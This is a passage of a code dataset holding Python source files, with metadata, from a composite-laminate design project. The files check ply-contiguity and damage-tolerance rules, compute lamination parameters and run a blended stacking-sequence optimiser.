2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4] \\\r\n and stack[jj]==stack[jj + 5]:\r\n return False\r\n\r\n elif constraints.n_contig == 6:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4] \\\r\n and stack[jj]==stack[jj + 5] \\\r\n and stack[jj]==stack[jj + 6]:\r\n return False\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n return True\r\n\r\n\r\ndef internal_contig(angle, constraints, angle2=None):\r\n '''\r\nreturns only the stacking sequences that satisfy the contiguity rule\r\n\r\nOUTPUTS\r\n\r\n- angle: the selected sublaminate stacking sequences line by\r\nline\r\n- angle2: the selected sublaminate stacking sequences line by\r\nline if a second sublaminate is given as input for angle2\r\n\r\nINPUTS\r\n\r\n- angle: the first sublaminate stacking sequences\r\n- angle:2 matrix storing the second sublaminate stacking sequences\r\n\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, angle.size))\r\n n_plies_group = angle.shape[1]\r\n\r\n # TO ENSURE CONTIGUITY\r\n if constraints.contig:\r\n # To ensure the contiguity constraint within groups of plies\r\n\r\n if not angle2 is None:\r\n\r\n if constraints.n_contig < n_plies_group:\r\n diff = n_plies_group-constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 3]==angle[ii, jj + 1]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 
4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 1] \\\r\n and angle[ii, jj + 2]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5] \\\r\n and angle[ii, jj]==angle[ii, jj + 6]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n angle2 = np.delete(angle2, np.s_[ii], axis=0)\r\n break\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n\r\n else:\r\n\r\n if constraints.n_contig < n_plies_group:\r\n diff = n_plies_group-constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 3:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 4:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 5:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n elif constraints.n_contig == 6:\r\n\r\n a = angle.shape[0]\r\n for ii in range(a)[::-1]:\r\n\r\n for jj in np.arange(diff):\r\n if angle[ii, jj]==angle[ii, jj + 1] \\\r\n and angle[ii, jj]==angle[ii, jj + 2] \\\r\n and angle[ii, jj]==angle[ii, jj + 3] \\\r\n and angle[ii, jj]==angle[ii, jj + 4] \\\r\n and angle[ii, jj]==angle[ii, jj + 5] \\\r\n and angle[ii, jj]==angle[ii, jj + 6]:\r\n angle = np.delete(angle, np.s_[ii], axis=0)\r\n break\r\n\r\n else:\r\n raise Exception(\r\n 'constraints.n_contig must be 2, 3, 4 or 5')\r\n\r\n return angle, angle2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 'Test'\r\n\r\n import sys\r\n 
sys.path.append(r'C:\\BELLA')\r\n from src.LAYLA_V02.constraints import Constraints\r\n from src.divers.pretty_print import print_list_ss\r\n\r\n constraints = Constraints()\r\n constraints.contig = True\r\n constraints.n_contig = 5\r\n\r\n print('*** Test for the function internal_contig ***\\n')\r\n print('Input stacking sequences:\\n')\r\n ss = np.array([[0, 0, 45, 0, 0, 45, 90, 0, 45, 90],\r\n [0, 0, 0, 0, 0, 0, 90, 90, 45, 90],\r\n [0, 0, 0, 0, 0, 0, 90, 90, 45, 90]])\r\n print_list_ss(ss)\r\n test = internal_contig(ss, constraints)[0]\r\n if test.shape[0]:\r\n print('Stacking sequences satisfying the rule:\\n')\r\n print_list_ss(test)\r\n else:\r\n print('No stacking sequence satisfy the rule\\n')\r\n\r\n\r\n\r\n\r\n"
},
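The `elif` chains in this record hard-code the contiguity test for `n_contig` values 2 through 6, while the exception message still lists only '2, 3, 4 or 5'. The run-length sketch below handles any `n_contig >= 1`; it is an assumed-equivalent alternative, not the repository's implementation.

    :::python
    # Run-length sketch of the contiguity rule: more than n_contig identical
    # ply angles in a row violate the guideline.
    import numpy as np

    def is_contig_ok(stack, n_contig):
        stack = np.asarray(stack).ravel()
        run = 1
        for prev, cur in zip(stack[:-1], stack[1:]):
            run = run + 1 if cur == prev else 1
            if run > n_contig:
                return False
        return True

    print(is_contig_ok([0, 0, 45, 0, 0, 45, 90, 0, 45, 90], 2))  # True
    print(is_contig_ok([0, 0, 0, 0, 0, 0, 90, 90, 45, 90], 5))   # False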
{
"alpha_fraction": 0.6684402823448181,
"alphanum_fraction": 0.6725972890853882,
"avg_line_length": 36.79999923706055,
"blob_id": "67d43cb4a4d31639a1b04c30f7a12d2a546a315d",
"content_id": "b8d152e3ed4510fb82600fcb6bbe5a5ac3b04aa3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6014,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 155,
"path": "/src/BELLA/optimiser.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nOptimisation of a composite laminate design\r\n\"\"\"\r\n\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.results import BELLA_Results\r\n#from src.BELLA.divide_panels_1 import divide_panels_1\r\nfrom src.BELLA.pdl_ini import create_initial_pdls, check_pdls_ini\r\nfrom src.BELLA.divide_panels import divide_panels\r\nfrom src.BELLA.ply_order import calc_ply_order\r\nfrom src.BELLA.moments_of_areas import calc_mom_of_areas\r\nfrom src.BELLA.lampam_matrix import calc_delta_lampams\r\nfrom src.BELLA.optimiser_with_one_pdl import BELLA_optimiser_one_pdl\r\nfrom src.BELLA.save_set_up import save_constraints_BELLA, save_parameters_BELLA\r\nfrom src.BELLA.save_set_up import save_multipanel, save_objective_function_BELLA\r\nfrom src.BELLA.save_set_up import save_materials\r\nfrom src.BELLA.save_result import save_result_BELLAs\r\nfrom src.divers.excel import autofit_column_widths, delete_file\r\nfrom src.BELLA.format_pdl import extend_after_guide_based_blending\r\nfrom src.BELLA.pdl_ini import read_pdls_excel\r\n\r\ndef BELLA_optimiser(\r\n multipanel, parameters, obj_func_param, constraints, filename,\r\n mat=None, filename_initial_pdls=None):\r\n \"\"\"\r\n performs the retrieval of blended stacking sequences from\r\n lamination-parameter targets\r\n\r\n - BELLA_results: results of the optimisation\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - constraints: lay-up design guidelines\r\n - obj_func_param: objective function parameters\r\n - targets: target lamination parameters and ply counts\r\n - mat: material properties\r\n - filename: name of the file where to save results\r\n - pdls_ini: initial ply-drop layouts (opyional)\r\n \"\"\"\r\n ### initialisation\r\n t0 =time.time()\r\n\r\n delete_file(filename)\r\n\r\n multipanel.should_you_use_BELLA()\r\n multipanel.calc_weight_per_panel(mat.density_area)\r\n multipanel.filter_target_lampams(constraints, obj_func_param)\r\n multipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n ### step 1 of BELLA: mapping the multi-panel structure to a blending strip\r\n print('---- Blending step 1 ----')\r\n multipanel.from_mp_to_blending_strip(\r\n constraints, parameters.n_plies_ref_panel)\r\n\r\n ### step 2 of BELLA: generation of initial ply drop layouts\r\n print('---- Blending step 2 ----')\r\n\r\n if filename_initial_pdls is None:\r\n # creation of the initial ply drop layouts\r\n divide_panels(multipanel, parameters, constraints)\r\n pdls_ini = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)\r\n else:\r\n # read initial ply-drop layouts\r\n pdls_ini = read_pdls_excel(filename_initial_pdls)\r\n # number of initial ply drops to be tested\r\n parameters.n_ini_ply_drops = len(pdls_ini)\r\n # check the correct number of plies and panels in the ply drop layouts\r\n check_pdls_ini(multipanel, pdls_ini)\r\n\r\n ### preparation of the step 3 of BELLA\r\n\r\n # division of the plies of the panels into one ply group\r\n group_size_max = parameters.group_size_max\r\n parameters.group_size_max = 10000\r\n divide_panels(multipanel, parameters, constraints)\r\n parameters.group_size_max = group_size_max\r\n\r\n # initialisation of the results\r\n results = BELLA_Results(constraints, multipanel, parameters)\r\n\r\n # list of the orders in which plies are optimised in each panels\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n# 
print('ply_order')\r\n# print(ply_order)\r\n\r\n # mom_areas_plus: positive ply moments of areas\r\n # mom_areas: ply moments of areas\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n # calculation of ply partial lamination parameters\r\n delta_lampams = calc_delta_lampams(\r\n multipanel, constraints, mom_areas, ply_order)\r\n\r\n outer_step = 0\r\n\r\n while outer_step < parameters.n_ini_ply_drops:\r\n\r\n ### step 3 and 4 of BELLA: ply angle optimisation + laminate repair\r\n print('---- Blending step 3 ----')\r\n results_one_pdl = BELLA_optimiser_one_pdl(\r\n multipanel, parameters, obj_func_param, constraints, ply_order,\r\n mom_areas_plus, delta_lampams, pdls_ini[outer_step], mat=mat)\r\n\r\n results.update(outer_step, results_one_pdl)\r\n\r\n ## === If the stacking sequence is good enough, exit the loop\r\n if results_one_pdl is not None:\r\n if abs(results_one_pdl.obj_constraints).all() < 1e-10:\r\n print(f\"\"\"Low objective for the outer step {outer_step}.\"\"\")\r\n break\r\n\r\n outer_step += 1\r\n\r\n # To determine the best solution\r\n ind_mini = np.argmin(results.obj_constraints_tab)\r\n\r\n results.ss = results.ss_tab[ind_mini]\r\n results.sst = results.ss_tab_tab[ind_mini]\r\n results.lampam = results.lampam_tab_tab[:, ind_mini, :]\r\n results.n_plies_per_angle = results.n_plies_per_angle_tab[ind_mini]\r\n results.obj_constraints = results.obj_constraints_tab[ind_mini]\r\n results.obj_no_constraints = results.obj_no_constraints_tab[ind_mini]\r\n results.ind_mini = ind_mini\r\n results.time = time.time() - t0\r\n\r\n # save data\r\n save_constraints_BELLA(filename, constraints)\r\n if mat is not None:\r\n save_materials(filename, mat)\r\n save_parameters_BELLA(filename, parameters)\r\n save_objective_function_BELLA(filename, obj_func_param)\r\n save_multipanel(filename, multipanel, obj_func_param, mat)\r\n\r\n pdls = np.zeros((len(pdls_ini),\r\n multipanel.n_panels,\r\n multipanel.n_plies_max))\r\n for ind in range(len(pdls_ini)):\r\n pdls[ind] = np.array(\r\n extend_after_guide_based_blending(multipanel, pdls_ini[ind]))\r\n save_result_BELLAs(filename, multipanel, constraints, parameters,\r\n obj_func_param, pdls, results, mat)\r\n autofit_column_widths(filename)\r\n\r\n return results\r\n"
},
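One detail worth a second look in `BELLA_optimiser` above: the early-exit test `abs(results_one_pdl.obj_constraints).all() < 1e-10` compares the boolean returned by `.all()` against `1e-10`, which is unlikely to be the intent. A sketch of the presumably intended element-wise check (the array below is a hypothetical stand-in, not real optimiser output):

    :::python
    # Presumed intent of the early-exit test: stop trying further ply-drop
    # layouts once every penalised objective term is negligible.
    import numpy as np

    obj_constraints = np.array([0.0, 5e-12])  # hypothetical stand-in values

    if (np.abs(obj_constraints) < 1e-10).all():
        print('Low objective; stop testing further ply-drop layouts.')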
{
"alpha_fraction": 0.5960389375686646,
"alphanum_fraction": 0.607819676399231,
"avg_line_length": 36.04545593261719,
"blob_id": "2174d80b90cded11517a084cc3bb3951d9f093b7",
"content_id": "ab1804db884ce2b1e00042f47fd233ffcb3fb13f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5857,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 154,
"path": "/src/BELLA/lampam_matrix.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nAll possible ply lamination parameters\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_delta_lampam_mp_3\r\nfrom src.CLA.lampam_functions import calc_delta_lampam\r\n\r\n\r\ndef calc_delta_lampams(multipanel, constraints, mom_areas, ply_order):\r\n \"\"\"\r\n calulates all ply partial lamination parameters in a multipanel structure\r\n\r\n INPUTS\r\n\r\n - multipanel: multi-panel structure\r\n - constraints: set of constraints\r\n - mom_areas[panel_index, ply_index, 0]:\r\n area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas[panel_index, ply_index, 1]:\r\n first moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - mom_areas[panel_index, ply_index, 2]:\r\n second moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n \"\"\"\r\n delta_lampams = []\r\n\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n if constraints.sym:\r\n n_plies_panel = panel.n_plies // 2 + panel.n_plies % 2\r\n delta_lampams_panel = np.empty((\r\n n_plies_panel,\r\n constraints.n_set_of_angles,\r\n 12), float)\r\n for ind_ply in range(n_plies_panel):\r\n\r\n\r\n delta_lampams_panel[ind_ply, :, 0:4] \\\r\n = mom_areas[ind_panel][ind_ply, 0] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 4:8] = 0\r\n delta_lampams_panel[ind_ply, :, 8:12] \\\r\n = mom_areas[ind_panel][ind_ply, 2] * constraints.cos_sin\r\n if panel.n_plies % 2 and ind_ply == panel.middle_ply_index:\r\n delta_lampams_panel[ind_ply, :, :] /= 2\r\n\r\n else:\r\n delta_lampams_panel = np.empty((\r\n panel.n_plies, constraints.n_set_of_angles,\r\n 12), float)\r\n for ind_ply in range(delta_lampams_panel.shape[0]):\r\n delta_lampams_panel[ind_ply, :, 0:4] \\\r\n = mom_areas[ind_panel][ind_ply, 0] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 4:8] \\\r\n = mom_areas[ind_panel][ind_ply, 1] * constraints.cos_sin\r\n delta_lampams_panel[ind_ply, :, 8:12] \\\r\n = mom_areas[ind_panel][ind_ply, 2] * constraints.cos_sin\r\n\r\n delta_lampams.append(delta_lampams_panel)\r\n\r\n return delta_lampams\r\n\r\n\r\ndef calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise):\r\n \"\"\"\r\n calulates all ply partial lamination parameters in a multipanel structure\r\n that correspond to a specific ply drop layout\r\n\r\n INPUTS\r\n\r\n - multipanel: multipanel structure\r\n - delta_lampams: all ply partial lamination parameters in the multipanel\r\n structure\r\n - pdl: ply drop layout\r\n - constraints: set of constraints\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n \"\"\"\r\n lampam_matrix = np.zeros((\r\n multipanel.reduced.n_panels,\r\n constraints.n_set_of_angles,\r\n n_plies_to_optimise,\r\n 12), float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n for ind_angle in range(constraints.n_set_of_angles):\r\n counter_plies = -1\r\n for index_ply in range(n_plies_to_optimise):\r\n if pdl[ind_panel, index_ply] != -1:\r\n counter_plies += 1\r\n# print('ind_panel, ind_angle, index_ply',\r\n# ind_panel, ind_angle, index_ply)\r\n# print('counter_plies', counter_plies)\r\n lampam_matrix[ind_panel, ind_angle, index_ply, :] \\\r\n = delta_lampams[ind_panel][counter_plies, ind_angle]\r\n return 
lampam_matrix\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_delta_lampams ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.panels import Panel\r\n from src.BELLA.multipanels import MultiPanel\r\n from src.BELLA.parameters import Parameters\r\n from src.BELLA.obj_function import ObjFunction\r\n from src.BELLA.ply_order import calc_ply_order\r\n from src.BELLA.moments_of_areas import calc_mom_of_areas\r\n from src.BELLA.pdl_ini import create_initial_pdls\r\n from src.BELLA.divide_panels import divide_panels\r\n\r\n constraints = Constraints(sym=False)\r\n constraints = Constraints(sym=True)\r\n obj_func_param = ObjFunction(constraints)\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[], n_plies=6)\r\n multipanel = MultiPanel([panel1])\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[1], n_plies=16)\r\n panel2 = Panel(2, constraints, neighbour_panels=[1], n_plies=18)\r\n multipanel = MultiPanel([panel1, panel2])\r\n\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n delta_lampams = calc_delta_lampams(\r\n multipanel, constraints, mom_areas, ply_order)\r\n\r\n print(delta_lampams[0][0][0])\r\n print(delta_lampams[0][-1][0])\r\n\r\n\r\n print('*** Test for the functions calc_delta_lampams2 ***\\n')\r\n divide_panels(multipanel, parameters, constraints)\r\n pdl = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)[0]\r\n lampam_matrix = calc_delta_lampams2(\r\n multipanel, constraints, delta_lampams, pdl, n_plies_to_optimise)"
},
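The inner loop of `calc_delta_lampams2` above maps ply-drop-layout columns onto a panel's surviving plies: a `-1` entry marks a ply that is absent from the panel and contributes nothing, while every other entry consumes the panel's plies in order. A stripped-down illustration of that counter logic, with hypothetical stand-in values:

    :::python
    # -1 entries in the ply-drop layout row contribute zero; the counter
    # advances only over plies that exist in the panel.
    import numpy as np

    pdl_row = np.array([0, -1, 1, 2, -1, 3])         # hypothetical layout row
    ply_values = np.array([10.0, 20.0, 30.0, 40.0])  # stand-in per-ply terms

    out = np.zeros(pdl_row.size)
    counter = -1
    for i, entry in enumerate(pdl_row):
        if entry != -1:
            counter += 1
            out[i] = ply_values[counter]
    print(out)  # [10.  0. 20. 30.  0. 40.]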
{
"alpha_fraction": 0.5670102834701538,
"alphanum_fraction": 0.6082473993301392,
"avg_line_length": 31.576923370361328,
"blob_id": "ce7fe349504f92be09ca655632f9c37cad13f51c",
"content_id": "721a5c539572941829e80bdeb6a70c2c1d29fd42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 26,
"path": "/src/guidelines/test_dam_tol.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module tests the functions in dam_tol.py.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport pytest\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.guidelines.dam_tol import is_dam_tol\r\n\r\[email protected](\r\n \"stack, constraints, expect\", [\r\n (np.array([45, 0, -45]), Constraints(dam_tol=True, dam_tol_rule=1), True),\r\n (np.array([45, 0, 0]), Constraints(dam_tol=True, dam_tol_rule=1), False),\r\n (np.array([45, -45, 0, 45, -45]), Constraints(dam_tol=True, dam_tol_rule=2), True),\r\n (np.array([45, -45, 0, 90, -45]), Constraints(dam_tol=True, dam_tol_rule=2), False),\r\n ])\r\n\r\ndef test_is_dam_tol(stack, constraints, expect):\r\n output = is_dam_tol(stack, constraints)\r\n assert output == expect\r\n"
},
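The four parametrised cases above, together with the damage-tolerance rule descriptions in `run_LAYLA_V02.py` further down ('rule 1: one outer ply at + or -45 deg at laminate surfaces', 'rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces'), suggest the behaviour sketched below. This is an inference for illustration, not the actual `src.guidelines.dam_tol.is_dam_tol` implementation.

    :::python
    # Hedged sketch of is_dam_tol, inferred from the test cases above.
    import numpy as np

    def _pm45_pair(pair):
        return sorted(int(a) for a in pair) == [-45, 45]

    def is_dam_tol_sketch(stack, dam_tol_rule):
        if dam_tol_rule == 1:
            # rule 1: one outer ply at +45 or -45 deg on each surface
            return abs(int(stack[0])) == 45 and abs(int(stack[-1])) == 45
        if dam_tol_rule == 2:
            # rule 2: [+45, -45] or [-45, +45] pairs at both surfaces
            return _pm45_pair(stack[:2]) and _pm45_pair(stack[-2:])
        return True

    print(is_dam_tol_sketch(np.array([45, 0, -45]), 1))           # True
    print(is_dam_tol_sketch(np.array([45, -45, 0, 90, -45]), 2))  # False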
{
"alpha_fraction": 0.545465350151062,
"alphanum_fraction": 0.5545939803123474,
"avg_line_length": 41.14577865600586,
"blob_id": "a9bc8c466560f42bde8df0703c6c4b222a734536",
"content_id": "c5dfcf1a05bc5a2057fa66fc7d882bad2b1b3163",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16870,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 391,
"path": "/src/BELLA/reduced_multipanels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for reduced multi-panel structures\r\n\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\nclass ReducedMultiPanel():\r\n \"\"\"\r\n Class for reduced multi-panel structures\r\n \"\"\"\r\n def __init__(self, multipanel, constraints, n_plies_ref_panel=1):\r\n \"\"\"Create object for storing multi-panel structures information\r\n\r\n - n_plies_in_panels:\r\n the ordered list with the panels ply counts that are used to build\r\n the stacking sequence table.\r\n - n_panels:\r\n number of panels with diffrent thicknesses in the stacking sequence\r\n table\r\n - n_plies_ref_panel:\r\n ply count of reference panel\r\n - ind_panels_guide:\r\n a mapping of the panels of the structure with the corrresponding\r\n stack in the stacking sequence table\r\n - ind_for_reduc:\r\n indices of n_panels panels with different thickness\r\n - ind_ref:\r\n index of reference panel for repair\r\n - boundaries:\r\n list of panels adjacency to consider expressed with the indices for\r\n the reduced number of panels\r\n - panel_weightings_ini_2_guide:\r\n initial panel weightings in the reduced multipanel objective\r\n function\r\n - panel_weightings_ini_2A_guide:\r\n initial panel weightings in the reduced multipanel in-plane\r\n objective function\r\n - panel_weightings_ini_2D_guide:\r\n initial panel weightings in the reduced multipanel out-of-plane\r\n objective function\r\n \"\"\"\r\n\r\n (self.n_plies_in_panels, self.ind_for_reduc,\r\n self.ind_panels_guide) = np.unique(\r\n [panel.n_plies for panel in multipanel.panels],\r\n return_inverse=True, return_index=True)\r\n\r\n if constraints.sym:\r\n has_middle_ply = False\r\n for n_plies in self.n_plies_in_panels:\r\n if has_middle_ply and not n_plies % 2:\r\n raise Exception(\"\"\"\r\nThe panel ply counts are not compatible with guide-based blending (middle ply)\"\"\")\r\n if n_plies % 2:\r\n has_middle_ply = True\r\n\r\n self.ind_for_reduc = self.ind_for_reduc.astype(int)\r\n\r\n self.n_panels = self.n_plies_in_panels.size\r\n self.ind_thick = self.n_panels - 1\r\n\r\n# print('n_plies_in_panels', self.n_plies_in_panels)\r\n# print('n_panels', self.n_panels)\r\n# print('ind_panels_guide', self.ind_panels_guide)\r\n# print('ind_for_reduc', self.ind_for_reduc)\r\n\r\n # reduced panel weightings in the reduced multipanel objective function\r\n self.panel_weightings_ini = np.zeros((self.n_panels,))\r\n for ind_panel in range(self.n_panels):\r\n self.panel_weightings_ini[self.ind_panels_guide[\r\n ind_panel]] += self.panel_weightings_ini[ind_panel]\r\n# print('self.panel_weightings_ini', self.panel_weightings_ini)\r\n\r\n if n_plies_ref_panel in self.n_plies_in_panels:\r\n ind_min = np.argmin(abs(self.n_plies_in_panels-n_plies_ref_panel))\r\n self.ind_ref = ind_min\r\n if n_plies_ref_panel <= self.n_plies_in_panels[0]:\r\n self.ind_ref = 0\r\n elif n_plies_ref_panel >= self.n_plies_in_panels[-1]:\r\n self.ind_ref = self.n_panels - 1\r\n else:\r\n index = 0\r\n while True:\r\n n_plies_1 = self.n_plies_in_panels[index]\r\n n_plies_2 = self.n_plies_in_panels[index + 1]\r\n if n_plies_ref_panel > n_plies_1 \\\r\n and n_plies_ref_panel <= n_plies_2:\r\n self.ind_ref = index + 1\r\n break\r\n else:\r\n index += 1\r\n\r\n self.n_plies_ref_panel = self.n_plies_in_panels[self.ind_ref]\r\n\r\n self.panels = [multipanel.panels[self.ind_for_reduc[ind_panel]] \\\r\n for ind_panel in range(self.n_panels)]\r\n\r\n self.n_panels_thin = self.ind_ref + 1\r\n self.n_panels_thick = 
self.n_panels - self.ind_ref\r\n\r\n self.middle_ply_indices = np.array(\r\n [self.panels[ind_panel].middle_ply_index \\\r\n for ind_panel in range(self.n_panels)])\r\n\r\n self.check_boundary_weights(multipanel)\r\n\r\n self.calc_panel_weigthings(multipanel)\r\n\r\n self.calc_parameters(multipanel, constraints)\r\n\r\n def check_boundary_weights(self, multipanel):\r\n \"\"\"\r\n check the boundary weights\r\n\r\n \"\"\"\r\n self.boundaries = []\r\n for elem1, elem2 in multipanel.boundaries:\r\n elem1 = self.ind_panels_guide[elem1]\r\n elem2 = self.ind_panels_guide[elem2]\r\n loc_boundary = [elem1, elem2]\r\n loc_boundary.sort()\r\n if loc_boundary not in self.boundaries and elem1 != elem2:\r\n self.boundaries.append(loc_boundary)\r\n self.boundaries = np.array(self.boundaries)\r\n\r\n ## boundary weightings\r\n self.boundary_weights = dict()\r\n \r\n for panel1, panel2 in multipanel.boundaries:\r\n weight = multipanel.boundary_weights[(panel1, panel2)]\r\n panel1_in_strip = self.ind_panels_guide[panel1]\r\n panel2_in_strip = self.ind_panels_guide[panel2]\r\n panel1_in_strip, panel2_in_strip = sorted((panel1_in_strip, \r\n panel2_in_strip))\r\n if panel1_in_strip != panel2_in_strip:\r\n \r\n if (panel1_in_strip, panel2_in_strip) in self.boundary_weights:\r\n self.boundary_weights[\r\n (panel1_in_strip, panel2_in_strip)] += weight\r\n 